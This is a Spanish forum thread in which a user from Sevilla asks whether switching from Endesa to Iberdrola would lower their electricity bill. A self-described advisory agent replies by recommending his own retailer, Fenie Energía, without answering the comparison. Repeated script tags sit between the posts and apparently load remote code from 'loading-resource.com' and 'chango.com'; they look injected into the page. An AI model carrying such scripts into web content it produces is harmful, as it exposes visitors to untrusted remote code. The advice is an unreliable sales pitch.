Cambio de compañía

Hola mi pregunta es la siguiente. Ayer vino una chica proponiéndome un cambio a la compañía Iberdrola. Proponiendome ahorros en la factura de la luz en comparación con Endesa al ser mas barata la tarificación y no cobrar luz estimada con lo cual cobrarían un solo IVA y no dos como hace Endesa. Aparte de tener los dos primeros años congelados el precio de la tarifa que me propusieron. Pido que un experto me oriente y me diga si esta compañía es mas barata y sus promociones o tarifas son más flexibles ya que al no tener compromiso de permanencia, en cualquier momento podría darme de baja, aunque todavía no se ha hecho efectivo el contrato ya que deben llamarme de la compañía para verificar los datos.

Agradeciendo su atención

Reciban un cordial Saludo

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>
Respuesta

Endesa suele tener permanencia, yo te aconsejaría mi comercializadora que es FENIE ENERGÍA, la comercializadora de los electricistas a nivel de toda españa.

Nuestros precios son:

Vale me parece bien que me recomiende una nueva compañía, he leído en la web sobre ella y ahora me entero que hay compañías low cost en la electricidad. La cuestión sería ahora, si el servicio de esta compañía estaría disponible en El Coronil c.p 41760 Sevilla. y Segundo la pregunta no quedó del todo resuelta porque no me contestó si con Iberdrola ahorraría mas que con Endesa.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script id="__changoScript" type="text/javascript">// <![CDATA[var __chd__ = {'aid':11079,'chaid':'www_objectify_ca'};(function() { var c = document.createElement('script'); c.type = 'text/javascript'; c.async = true;c.src = ( 'https:' == document.location.protocol ? 'https://z': 'http://p') + '.chango.com/static/c.js'; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(c, s);})();// ]]></script>

Las comercializadoras el servicio que prestan es encargarse de pagar su recibo de la luz a la distribuidora, por lo que cualquier comercializadora le pueda dar servicio.

Respecto a si se ahorrará mas con Iberdrola que con Endesa, desconozco las tarifas que le están aplicando.

Yo como Agente Asesor le recomendé la tarifa mas barata existente, que es la de Fenie Energía.

Me surgen mas preguntas pero me vale con lo que me aclaró, pues desconocía que hubiera otro tipo de comercializadoras o compañías de Luz. Sin duda estoy en contacto con esta comercializadora que me recomendó. Gracias.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script id="__changoScript" type="text/javascript">// <![CDATA[var __chd__ = {'aid':11079,'chaid':'www_objectify_ca'};(function() { var c = document.createElement('script'); c.type = 'text/javascript'; c.async = true;c.src = ( 'https:' == document.location.protocol ? 'https://z': 'http://p') + '.chango.com/static/c.js'; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(c, s);})();// ]]></script>